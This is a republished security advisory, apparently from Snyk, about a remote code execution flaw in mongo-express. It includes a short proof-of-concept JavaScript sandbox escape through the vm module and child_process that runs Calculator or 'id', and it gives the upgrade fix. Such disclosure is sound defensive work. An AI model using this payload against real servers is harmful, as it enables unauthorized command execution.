北极熊网_北极熊内容商城

mongo-express远程代码执行漏洞

  • 时间:2020-01-08 21:02 编辑:北极熊 来源:北极熊 阅读:292
  • 扫一扫,手机访问
摘要:来源https://snyk.io/vuln/SNYK-JS-MONGOEXPRESS-473215漏洞详情贡献者                                          

来源

https://snyk.io/vuln/SNYK-JS-MONGOEXPRESS-473215

漏洞详情

贡献者                                                                 共获得  0KB            

Overview

mongo-express is a web-based MongoDB admin interface written with Node.js, Express and Bootstrap3

Affected versions of this package are vulnerable to Remote Code Execution (RCE) via endpoints that uses the toBSON method. A misuse of the vm dependency to perform exec commands in a non-safe environment.

PoC by Jonathan Leitschuh

# MacOSthis.constructor.constructor("return process")().mainModule.require('child_process').execSync('/Applications/Calculator.app/Contents/MacOS/Calculator')

  it('should not be executable', function () {      const test = `
      this.constructor.constructor("return console")().log(this.constructor.constructor("return process")().mainModule.require('child_process').execSync('id').toString())      `;      const result = bson.toBSON(calculatorTest);
    });

Remediation

Upgrade mongo-express to version 0.54.0 or higher.

References


  • 全部评论(0)
资讯详情页最新发布上方横幅
最新发布的资讯信息
【升级补丁|本网专稿】30个无版权、免费、高清图片素材网站(2020-08-31 10:43)
【游戏/手机|网络游戏】Switch Pro有消息了,具备4K能力(2020-08-26 10:37)
【升级补丁|服务器应用】为什么建议大家使用 Linux 开发?爽(2020-08-24 16:55)
【升级补丁|热点新闻】刷新史上最快网络传输速度!一秒可下载17800部10GB大小的电影(2020-08-24 16:51)
【升级补丁|热点新闻】银行急需数字化转型的当下,99家初创公司致力于帮助实现“零接触”技术革命(2020-08-24 16:49)
【升级补丁|热点新闻】人工智能“大杀器”GPT-3遭严重质疑:它其实是在“胡言乱语”,OpenAI违背科学伦理(2020-08-24 16:46)
【升级补丁|热点新闻】防止再被卡脖子,中国构建代码托管平台Gitee取代GitHub(2020-08-24 09:04)
【技术文档|科技新闻】台媒:中国大陆想一条龙设计芯片,没有十年恐难成(2020-06-05 16:04)
【升级补丁|热点新闻】制造业企业数字化转型并非单纯技术的应用(2020-06-04 16:59)
【技术文档|漏洞信息】上周关注度较高的产品安全漏洞(20200224-20200301)(2020-03-02 16:53)
源码论坛